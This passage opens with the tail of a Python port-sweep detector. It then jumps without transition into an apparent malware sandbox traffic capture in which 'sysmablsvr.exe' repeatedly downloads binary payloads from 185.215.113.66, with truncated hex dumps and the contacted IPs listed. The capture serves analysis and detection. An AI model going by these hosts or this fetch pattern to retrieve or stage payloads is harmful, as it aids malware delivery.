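    return [split_row(line, local_ip) for line in text.splitlines() if line.strip()]


def find_sweeps(records, local_ip=LOCAL_IP, min_targets=5, max_jitter_s=1.0):
    """Outbound rows grouped by (src_port, dst_port).  One source port hitting the same
    destination port on many distinct hosts at a steady cadence is a sweep."""
    groups = defaultdict(list)
    for r in records:
        if r["src_ip"] == local_ip:
            groups[(r["src_port"], r["dst_port"])].append(r)
    sweeps = []
    for (sp, dp), rows in groups.items():
        targets = {r["dst_ip"] for r in rows}
        if len(targets) < min_targets:
            continue
        times = sorted(r["ts"] for r in rows)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(gaps)
        if max(abs(g - period) for g in gaps) <= max_jitter_s:
            sweeps.append({"src_port": sp, "dst_port": dp,
                           "targets": len(targets), "period_s": round(period, 2)})
    return sweeps


if __name__ == "__main__":
    for s in find_sweeps(parse_rows(SAMPLE_ROWS)):
        print(f"sweep: sport {s['src_port']} -> dport {s['dst_port']}, "
              f"{s['targets']} hosts, every {s['period_s']} s")
```

Running the block on the ten sample rows reports one sweep: source port 59145 to port 40500 on six hosts at a period of about 5 seconds, while the TCP rows (single destinations on ports 80 and 40500) are left alone. Lower `min_targets` or raise `max_jitter_s` only with a reason; both are the knobs that separate a sweep from ordinary keep-alive traffic.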
                                            • 185.215.113.66
                                            • 77.91.77.92
                                            • 91.202.233.141
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.4  49730  185.215.113.66  80  6768  C:\Windows\sysmablsvr.exe
Timestamp  Bytes transferred  Direction  Data
Sep 17, 2024 23:09:15.569209099 CEST  166  OUT  GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
Sep 17, 2024 23:09:16.259267092 CEST  1236  IN  HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:16 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
                                            Connection: keep-alive
                                            ETag: "66e9ef5f-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 14 1a ce da 82 08 ba 24 75 30 7f 6a ed 06 00 e6 10 10 57 dd e0 5a 01 72 bd f9 d5 ed 1c 35 60 f9 32 ce d3 a5 ea 4d 2a e6 0c e1 3c 65 d9 da f4 7e 2e 7e c6 ba 6c 55 4d 43 8b 05 f1 2c 33 05 0f 5e ad 81 37 56 45 04 64 01 6c 05 f2 ca 9b fa c5 86 d7 7c d9 19 4e 35 30 82 8a e7 0f 4c 4f 27 fa f6 0f 6d b1 63 2f 86 d4 9b b3 b8 9e 89 04 9f cc 59 b6 c8 6c 39 8e 85 db 24 67 1e 58 a4 34 75 41 9a ef 46 4a a7 1f ea b8 e5 66 6b 34 84 cb d2 5a 5c 61 e3 2a ec c0 b3 7a 6d bd 66 90 03 6b 60 c1 d3 3d cd f9 87 e8 32 b6 e7 85 b9 e4 c8 61 17 9d 1c 0d 5c 46 b8 c4 60 53 71 ba ab 09 fc ef 95 54 1c 84 a0 7a d9 10 c0 39 d8 2e 2d 2a 56 d3 b6 ee ee c1 dc cd 7a 9e 33 73 ec 32 64 ae 69 89 98 32 5a 29 b9 f2 81 dd 89 8c 00 6b 4a f7 21 ba ae 4a dc 2c 5f a9 20 d6 81 fd 4d f4 76 b4 52 7a 8f 9b 01 cc af 72 96 0d e8 7f cf 9e 80 24 c7 d2 ae 56 27 1f c6 27 9e 0a 4b 97 c9 ab ab d5 b7 40 4a fb b8 5a b5 13 1d 45 de ed 7b 13 44 ed e2 38 90 ef cf 34 ad 54 5b 38 00 6a 93 51 63 8b be a0 f0 20 18 4f 49 f8 31 a7 c2 9c 9a 36 cc 52 ac 12 de 12 6d f1 54 [TRUNCATED]
                                            Data Ascii: $u0jWZr5`2M*<e~.~lUMC,3^7VEdl|N50LO'mc/Yl9$gX4uAFJfk4Z\a*zmfk`=2a\F`SqTz9.-*Vz3s2di2Z)kJ!J,_ MvRzr$V''K@JZE{D84T[8jQc OI16RmT=gyJV9qUMuD6QEl"{.d=~rD$Ep=-Kg|I&]c)XYT,x7~W9r{$hKKvfK5w}yBLS^nX]P>=qU0_D*F&BRB1+Y@$2c#6:Pnr}$x/ql~p2 Qm&>CG)Iu$.I@q;@T9u'Odcm7r}y*}}?FHwx,6,$sg"S|Y):#lQLqye)>8`56f/iIq)cKG-i)iM1-]eLd3}fDA]\<Jr~SWEoXf5O5_g5,V|sB}T;uQT:z~*B88Smqm*gg9D;W@t^
                                            Sep 17, 2024 23:09:16.259324074 CEST1236INData Raw: a8 cd b6 25 a2 da 1a 53 6e 9c 3d e0 c0 2c b0 89 c9 36 5e 59 78 e5 46 22 d4 dd 8d ff 8c 57 da 6b 79 15 f8 be 5e db e9 49 15 0f f8 c3 4f 96 07 14 e2 9a 29 ff 2d 40 fd 3b 29 86 ca 57 e5 fb 68 04 d3 a7 dd 89 cf e1 60 e7 16 2d 5e 1f e7 1c 80 8e 86 df
                                            Data Ascii: %Sn=,6^YxF"Wky^IO)-@;)Wh`-^<`;!L?S@MN!$R"RgVUFcl{a6J4;_9=ipvrbLp}=|7 '.t}!sc\=}j
Sep 17, 2024 23:09:16.259356022 CEST  1236  IN  Data Raw: bd 52 fd db cc 9b fc 19 4c 24 14 3a f8 15 aa f8 d2 28 b0 81 08 a3 83 e9 8d a9 68 84 95 22 8f bf 70 c5 c3 31 4f 46 17 26 19 c0 74 19 3a df 70 26 8d c0 61 94 1f b2 60 86 45 0b 4f 28 60 1a 98 cc 83 f5 48 8b 87 ce 2c 0c 8c 32 08 c5 3c 6a 67 68 8a 1b
                                            Data Ascii: RL$:(h"p1OF&t:p&a`EO(`H,2<jgh<lWm6Yi-"i^t(/v%Y{H5IiNsO6\gP=a-jR94,Gi!xr~Z)F<WR4Z-+lm[*
Sep 17, 2024 23:09:16.259716988 CEST  1236  IN  Data Raw: d7 f3 2e 8d 8d 14 f5 b5 9f 7a 63 f6 a5 d8 1a 7c 20 73 ff 8e 3d 30 7a dd eb 21 21 b3 f9 61 8c d5 2b fe 2d a1 ba 84 7b d4 a9 1d 58 0e 2b 45 90 e9 60 fe 22 89 e1 f0 b4 9a 10 da cd 73 31 e1 bb 58 72 26 c0 bf e3 d9 d3 02 33 02 61 b9 fe 1e bc 27 56 16
                                            Data Ascii: .zc| s=0z!!a+-{X+E`"s1Xr&3a'VS:JN4sZO~"NX#"{W`0c>?'Ao.mcBF+5),Tk.8O:*Uvw}!\NvuLscl,UdS*uEcSh.
Sep 17, 2024 23:09:16.259732008 CEST  1236  IN  Data Raw: fb b6 7f 01 cb 83 9c ee 28 41 1b 8d 78 f9 94 d9 c6 b9 86 0b e3 73 c1 45 58 68 0b ab d3 47 ef 20 86 7b 55 d3 0c c7 b1 57 4f a7 20 cc 91 fa 41 9a 3d 58 7d e2 89 40 e4 51 3c 59 f9 49 f2 74 56 b3 66 34 4f 7c 10 6b bf f5 25 ce f7 63 be 60 cf 88 9f c7
                                            Data Ascii: (AxsEXhG {UWO A=X}@Q<YItVf4O|k%c`1HY@:o|k*(NTR^UZ!%W?y!\2LF%0HN7(%u*)X6OP3O9U+8t@GB<5V<u2JgHVQM`WBuS*
Sep 17, 2024 23:09:16.259747982 CEST  1236  IN  Data Raw: 90 bf ae ec 13 9d a5 4b e9 3e 96 7d 0f 9d b6 32 3c 1a 52 f8 10 a1 cf 98 d2 01 cf 79 55 d5 06 f1 2b cf f1 19 79 42 ba 77 de b5 f5 09 d1 13 61 a4 39 69 3f 6c ba 23 9c 2a bb ac 20 1c d2 25 85 7d f6 de a1 1f 26 49 d8 fb 80 30 2d c2 27 f1 9d 56 c6 3a
                                            Data Ascii: K>}2<RyU+yBwa9i?l#* %}&I0-'V:7ih`JX`JyJ 7#g=cfxe*z}^Gbbw;+1Pl\C&fots7I>5U^'7
Sep 17, 2024 23:09:16.260427952 CEST  776  IN  Data Raw: af 2d 94 59 fe 1d 33 87 3e e9 41 18 09 db d0 b8 9b 92 b4 44 c0 1e b5 bc 8e dd 96 e8 06 f3 c6 a1 5a a3 a9 93 28 47 ce 2b dc 08 af 4e 85 c6 48 22 91 67 96 5b ab af d2 7f bf de 80 e2 3c d5 57 b8 35 24 f9 39 e7 93 01 7b 25 f3 d7 59 75 0d f9 37 8c 7f
                                            Data Ascii: -Y3>ADZ(G+NH"g[<W5$9{%Yu7seOC{%XIcbc&Ch2?`c%2H5_@&r3-"j41%%uv#Sh}<~~`FF<Eq:7M{(hNYf'


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.4  49732  185.215.113.66  80  6768  C:\Windows\sysmablsvr.exe
Timestamp  Bytes transferred  Direction  Data
Sep 17, 2024 23:09:17.274733067 CEST  166  OUT  GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
Sep 17, 2024 23:09:17.984699965 CEST  1236  IN  HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:17 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
                                            Connection: keep-alive
                                            ETag: "66e9ef5f-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 14 1a ce da 82 08 ba 24 75 30 7f 6a ed 06 00 e6 10 10 57 dd e0 5a 01 72 bd f9 d5 ed 1c 35 60 f9 32 ce d3 a5 ea 4d 2a e6 0c e1 3c 65 d9 da f4 7e 2e 7e c6 ba 6c 55 4d 43 8b 05 f1 2c 33 05 0f 5e ad 81 37 56 45 04 64 01 6c 05 f2 ca 9b fa c5 86 d7 7c d9 19 4e 35 30 82 8a e7 0f 4c 4f 27 fa f6 0f 6d b1 63 2f 86 d4 9b b3 b8 9e 89 04 9f cc 59 b6 c8 6c 39 8e 85 db 24 67 1e 58 a4 34 75 41 9a ef 46 4a a7 1f ea b8 e5 66 6b 34 84 cb d2 5a 5c 61 e3 2a ec c0 b3 7a 6d bd 66 90 03 6b 60 c1 d3 3d cd f9 87 e8 32 b6 e7 85 b9 e4 c8 61 17 9d 1c 0d 5c 46 b8 c4 60 53 71 ba ab 09 fc ef 95 54 1c 84 a0 7a d9 10 c0 39 d8 2e 2d 2a 56 d3 b6 ee ee c1 dc cd 7a 9e 33 73 ec 32 64 ae 69 89 98 32 5a 29 b9 f2 81 dd 89 8c 00 6b 4a f7 21 ba ae 4a dc 2c 5f a9 20 d6 81 fd 4d f4 76 b4 52 7a 8f 9b 01 cc af 72 96 0d e8 7f cf 9e 80 24 c7 d2 ae 56 27 1f c6 27 9e 0a 4b 97 c9 ab ab d5 b7 40 4a fb b8 5a b5 13 1d 45 de ed 7b 13 44 ed e2 38 90 ef cf 34 ad 54 5b 38 00 6a 93 51 63 8b be a0 f0 20 18 4f 49 f8 31 a7 c2 9c 9a 36 cc 52 ac 12 de 12 6d f1 54 [TRUNCATED]
                                            Data Ascii: $u0jWZr5`2M*<e~.~lUMC,3^7VEdl|N50LO'mc/Yl9$gX4uAFJfk4Z\a*zmfk`=2a\F`SqTz9.-*Vz3s2di2Z)kJ!J,_ MvRzr$V''K@JZE{D84T[8jQc OI16RmT=gyJV9qUMuD6QEl"{.d=~rD$Ep=-Kg|I&]c)XYT,x7~W9r{$hKKvfK5w}yBLS^nX]P>=qU0_D*F&BRB1+Y@$2c#6:Pnr}$x/ql~p2 Qm&>CG)Iu$.I@q;@T9u'Odcm7r}y*}}?FHwx,6,$sg"S|Y):#lQLqye)>8`56f/iIq)cKG-i)iM1-]eLd3}fDA]\<Jr~SWEoXf5O5_g5,V|sB}T;uQT:z~*B88Smqm*gg9D;W@t^
Sep 17, 2024 23:09:17.984724045 CEST  1236  IN  Data Raw: a8 cd b6 25 a2 da 1a 53 6e 9c 3d e0 c0 2c b0 89 c9 36 5e 59 78 e5 46 22 d4 dd 8d ff 8c 57 da 6b 79 15 f8 be 5e db e9 49 15 0f f8 c3 4f 96 07 14 e2 9a 29 ff 2d 40 fd 3b 29 86 ca 57 e5 fb 68 04 d3 a7 dd 89 cf e1 60 e7 16 2d 5e 1f e7 1c 80 8e 86 df
                                            Data Ascii: %Sn=,6^YxF"Wky^IO)-@;)Wh`-^<`;!L?S@MN!$R"RgVUFcl{a6J4;_9=ipvrbLp}=|7 '.t}!sc\=}j
Sep 17, 2024 23:09:17.984756947 CEST  1236  IN  Data Raw: bd 52 fd db cc 9b fc 19 4c 24 14 3a f8 15 aa f8 d2 28 b0 81 08 a3 83 e9 8d a9 68 84 95 22 8f bf 70 c5 c3 31 4f 46 17 26 19 c0 74 19 3a df 70 26 8d c0 61 94 1f b2 60 86 45 0b 4f 28 60 1a 98 cc 83 f5 48 8b 87 ce 2c 0c 8c 32 08 c5 3c 6a 67 68 8a 1b
                                            Data Ascii: RL$:(h"p1OF&t:p&a`EO(`H,2<jgh<lWm6Yi-"i^t(/v%Y{H5IiNsO6\gP=a-jR94,Gi!xr~Z)F<WR4Z-+lm[*
Sep 17, 2024 23:09:17.985251904 CEST  1236  IN  Data Raw: d7 f3 2e 8d 8d 14 f5 b5 9f 7a 63 f6 a5 d8 1a 7c 20 73 ff 8e 3d 30 7a dd eb 21 21 b3 f9 61 8c d5 2b fe 2d a1 ba 84 7b d4 a9 1d 58 0e 2b 45 90 e9 60 fe 22 89 e1 f0 b4 9a 10 da cd 73 31 e1 bb 58 72 26 c0 bf e3 d9 d3 02 33 02 61 b9 fe 1e bc 27 56 16
                                            Data Ascii: .zc| s=0z!!a+-{X+E`"s1Xr&3a'VS:JN4sZO~"NX#"{W`0c>?'Ao.mcBF+5),Tk.8O:*Uvw}!\NvuLscl,UdS*uEcSh.
Sep 17, 2024 23:09:17.985268116 CEST  1236  IN  Data Raw: fb b6 7f 01 cb 83 9c ee 28 41 1b 8d 78 f9 94 d9 c6 b9 86 0b e3 73 c1 45 58 68 0b ab d3 47 ef 20 86 7b 55 d3 0c c7 b1 57 4f a7 20 cc 91 fa 41 9a 3d 58 7d e2 89 40 e4 51 3c 59 f9 49 f2 74 56 b3 66 34 4f 7c 10 6b bf f5 25 ce f7 63 be 60 cf 88 9f c7
                                            Data Ascii: (AxsEXhG {UWO A=X}@Q<YItVf4O|k%c`1HY@:o|k*(NTR^UZ!%W?y!\2LF%0HN7(%u*)X6OP3O9U+8t@GB<5V<u2JgHVQM`WBuS*
Sep 17, 2024 23:09:17.985284090 CEST  1236  IN  Data Raw: 90 bf ae ec 13 9d a5 4b e9 3e 96 7d 0f 9d b6 32 3c 1a 52 f8 10 a1 cf 98 d2 01 cf 79 55 d5 06 f1 2b cf f1 19 79 42 ba 77 de b5 f5 09 d1 13 61 a4 39 69 3f 6c ba 23 9c 2a bb ac 20 1c d2 25 85 7d f6 de a1 1f 26 49 d8 fb 80 30 2d c2 27 f1 9d 56 c6 3a
                                            Data Ascii: K>}2<RyU+yBwa9i?l#* %}&I0-'V:7ih`JX`JyJ 7#g=cfxe*z}^Gbbw;+1Pl\C&fots7I>5U^'7
Sep 17, 2024 23:09:17.985702038 CEST  776  IN  Data Raw: af 2d 94 59 fe 1d 33 87 3e e9 41 18 09 db d0 b8 9b 92 b4 44 c0 1e b5 bc 8e dd 96 e8 06 f3 c6 a1 5a a3 a9 93 28 47 ce 2b dc 08 af 4e 85 c6 48 22 91 67 96 5b ab af d2 7f bf de 80 e2 3c d5 57 b8 35 24 f9 39 e7 93 01 7b 25 f3 d7 59 75 0d f9 37 8c 7f
                                            Data Ascii: -Y3>ADZ(G+NH"g[<W5$9{%Yu7seOC{%XIcbc&Ch2?`c%2H5_@&r3-"j41%%uv#Sh}<~~`FF<Eq:7M{(hNYf'
Sep 17, 2024 23:09:18.072895050 CEST  8  IN  Data Raw: 1b b5 08 3e b6 9b 0d ab
                                            Data Ascii: >


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
2  192.168.2.4  49734  185.215.113.66  80  6768  C:\Windows\sysmablsvr.exe
Timestamp  Bytes transferred  Direction  Data
Sep 17, 2024 23:09:20.238425970 CEST  274  OUT  GET /1 HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: 185.215.113.66
                                            Connection: Keep-Alive
Sep 17, 2024 23:09:20.952914000 CEST  1236  IN  HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:20 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
                                            Connection: keep-alive
                                            ETag: "66e9ef5f-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 14 1a ce da 82 08 ba 24 75 30 7f 6a ed 06 00 e6 10 10 57 dd e0 5a 01 72 bd f9 d5 ed 1c 35 60 f9 32 ce d3 a5 ea 4d 2a e6 0c e1 3c 65 d9 da f4 7e 2e 7e c6 ba 6c 55 4d 43 8b 05 f1 2c 33 05 0f 5e ad 81 37 56 45 04 64 01 6c 05 f2 ca 9b fa c5 86 d7 7c d9 19 4e 35 30 82 8a e7 0f 4c 4f 27 fa f6 0f 6d b1 63 2f 86 d4 9b b3 b8 9e 89 04 9f cc 59 b6 c8 6c 39 8e 85 db 24 67 1e 58 a4 34 75 41 9a ef 46 4a a7 1f ea b8 e5 66 6b 34 84 cb d2 5a 5c 61 e3 2a ec c0 b3 7a 6d bd 66 90 03 6b 60 c1 d3 3d cd f9 87 e8 32 b6 e7 85 b9 e4 c8 61 17 9d 1c 0d 5c 46 b8 c4 60 53 71 ba ab 09 fc ef 95 54 1c 84 a0 7a d9 10 c0 39 d8 2e 2d 2a 56 d3 b6 ee ee c1 dc cd 7a 9e 33 73 ec 32 64 ae 69 89 98 32 5a 29 b9 f2 81 dd 89 8c 00 6b 4a f7 21 ba ae 4a dc 2c 5f a9 20 d6 81 fd 4d f4 76 b4 52 7a 8f 9b 01 cc af 72 96 0d e8 7f cf 9e 80 24 c7 d2 ae 56 27 1f c6 27 9e 0a 4b 97 c9 ab ab d5 b7 40 4a fb b8 5a b5 13 1d 45 de ed 7b 13 44 ed e2 38 90 ef cf 34 ad 54 5b 38 00 6a 93 51 63 8b be a0 f0 20 18 4f 49 f8 31 a7 c2 9c 9a 36 cc 52 ac 12 de 12 6d f1 54 [TRUNCATED]
                                            Data Ascii: $u0jWZr5`2M*<e~.~lUMC,3^7VEdl|N50LO'mc/Yl9$gX4uAFJfk4Z\a*zmfk`=2a\F`SqTz9.-*Vz3s2di2Z)kJ!J,_ MvRzr$V''K@JZE{D84T[8jQc OI16RmT=gyJV9qUMuD6QEl"{.d=~rD$Ep=-Kg|I&]c)XYT,x7~W9r{$hKKvfK5w}yBLS^nX]P>=qU0_D*F&BRB1+Y@$2c#6:Pnr}$x/ql~p2 Qm&>CG)Iu$.I@q;@T9u'Odcm7r}y*}}?FHwx,6,$sg"S|Y):#lQLqye)>8`56f/iIq)cKG-i)iM1-]eLd3}fDA]\<Jr~SWEoXf5O5_g5,V|sB}T;uQT:z~*B88Smqm*gg9D;W@t^
Sep 17, 2024 23:09:20.953231096 CEST  1236  IN  Data Raw: a8 cd b6 25 a2 da 1a 53 6e 9c 3d e0 c0 2c b0 89 c9 36 5e 59 78 e5 46 22 d4 dd 8d ff 8c 57 da 6b 79 15 f8 be 5e db e9 49 15 0f f8 c3 4f 96 07 14 e2 9a 29 ff 2d 40 fd 3b 29 86 ca 57 e5 fb 68 04 d3 a7 dd 89 cf e1 60 e7 16 2d 5e 1f e7 1c 80 8e 86 df
                                            Data Ascii: %Sn=,6^YxF"Wky^IO)-@;)Wh`-^<`;!L?S@MN!$R"RgVUFcl{a6J4;_9=ipvrbLp}=|7 '.t}!sc\=}j
Sep 17, 2024 23:09:20.953250885 CEST  448  IN  Data Raw: bd 52 fd db cc 9b fc 19 4c 24 14 3a f8 15 aa f8 d2 28 b0 81 08 a3 83 e9 8d a9 68 84 95 22 8f bf 70 c5 c3 31 4f 46 17 26 19 c0 74 19 3a df 70 26 8d c0 61 94 1f b2 60 86 45 0b 4f 28 60 1a 98 cc 83 f5 48 8b 87 ce 2c 0c 8c 32 08 c5 3c 6a 67 68 8a 1b
                                            Data Ascii: RL$:(h"p1OF&t:p&a`EO(`H,2<jgh<lWm6Yi-"i^t(/v%Y{H5IiNsO6\gP=a-jR94,Gi!xr~Z)F<WR4Z-+lm[*
Sep 17, 2024 23:09:20.953288078 CEST  1236  IN  Data Raw: 8a ff 83 22 c8 95 a3 8f b1 4a 38 b5 2d bb cd 5f 4e 56 ec 78 f2 2a 77 31 8e 84 ce 5f 01 9a 88 8c 69 78 7b fd d1 e9 90 ce fe 19 9e 71 f0 74 06 bd 8e 4b 2b c8 64 c7 2f 6c ac 9d 86 51 f9 3f 34 9e 6b 84 9f 6f bf 8a ab 20 11 6b d1 b9 32 c9 ad 31 26 8f
                                            Data Ascii: "J8-_NVx*w1_ix{qtK+d/lQ?4ko k21&p"NX^xp7'a#/n5za\a@hks_jq9mmC]ZF.?9&3FQQjOrl}u]?#B<
Sep 17, 2024 23:09:20.953299999 CEST  1236  IN  Data Raw: a3 9e 70 26 2d 00 71 9f 71 d4 4d 7a d0 f3 1c 0f 04 10 cb 9a 79 d7 26 8f 1d c1 cf 2b da 1a a8 b2 33 fa 6c 30 25 2e 24 74 32 6b 2f 20 ad 89 f4 1c 13 0e 03 f8 7a e3 ea 88 da f8 db d8 4b 75 28 fb 0d 03 74 64 2d c0 6f ec 7c 04 02 95 be 55 6f e0 c2 7c
                                            Data Ascii: p&-qqMzy&+3l0%.$t2k/ zKu(td-o|Uo|-mh3O4nloL;zvMwI6j( jxm%MN7c3"E eBQ%k75R3FF5B|Ws
Sep 17, 2024 23:09:20.953783035 CEST  1236  IN  Data Raw: 91 49 c1 2a 12 b8 b0 a9 d8 17 cb 3a 12 c7 e3 7c a5 03 4f b4 e0 6f 9c 0f e7 05 56 89 13 01 2e 57 8d a6 90 2d b4 9d 7e 7d ed 69 48 01 1d 6a 10 ef fe 4b e2 e5 f5 a4 22 95 85 0f af 55 50 55 e5 fb b7 be 00 67 40 4d f9 41 19 09 d0 1c fb 85 ca 46 e9 39
                                            Data Ascii: I*:|OoV.W-~}iHjK"UPUg@MAF9o_<,_7VMV>0pYZley?SAe~r$S0B(wtV74l#F{kf?se_<A9f^Lc}/ :DC=/~2JhY"j
Sep 17, 2024 23:09:20.953793049 CEST  672  IN  Data Raw: 33 25 5a 99 e4 c8 3a 3b b9 7d 52 56 ea 5a fd 47 b2 99 75 9a fe 01 89 11 e0 f9 89 a0 f0 57 aa 9a e0 f3 6a 1f db 8b 59 f6 8e 92 a8 6b d0 c0 d0 81 23 b7 de 98 3d 07 b3 98 4f 84 16 60 b3 dd ab 53 0a e4 77 2b cc e6 31 65 b3 5f 58 b3 04 3f 64 c3 84 f3
                                            Data Ascii: 3%Z:;}RVZGuWjYk#=O`Sw+1e_X?dVqB)?d4SDeF!/V!Wi((3QPn|CSe,CJ4s`j:iK<}"X'sTfDxmo}`n}7U;ufk %
Sep 17, 2024 23:09:20.953804970 CEST  892  IN  Data Raw: 7a 4b 6f ef aa 0f 77 0d 83 34 88 fb 2b 39 5a 33 36 0b 55 78 18 b5 1d 4b 2e 53 bb f5 c3 be 56 56 00 2c 57 3a 42 93 c7 6b 32 e2 64 cf cc 52 86 1c 06 2c 9e 8d b7 ee 5e 48 a8 a0 21 94 c6 90 ca d0 1f 56 f1 78 43 e3 ce 12 f6 83 74 ea b0 80 66 2a cc fe
                                            Data Ascii: zKow4+9Z36UxK.SVV,W:Bk2dR,^H!VxCtf*0Cg:@<)UQp2g~&-Y3>ADZ(G+NH"g[<W5$9{%Yu7seOC{%XIcbc&Ch2?
Sep 17, 2024 23:09:21.039796114 CEST  8  IN  Data Raw: 1b b5 08 3e b6 9b 0d ab
                                            Data Ascii: >
Sep 17, 2024 23:09:23.163697958 CEST  166  OUT  GET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
Sep 17, 2024 23:09:23.386266947 CEST  728  IN  HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:23 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Sep 17, 2024 23:09:25.442640066 CEST  166  OUT  GET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
Sep 17, 2024 23:09:25.664438009 CEST  728  IN  HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:25 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
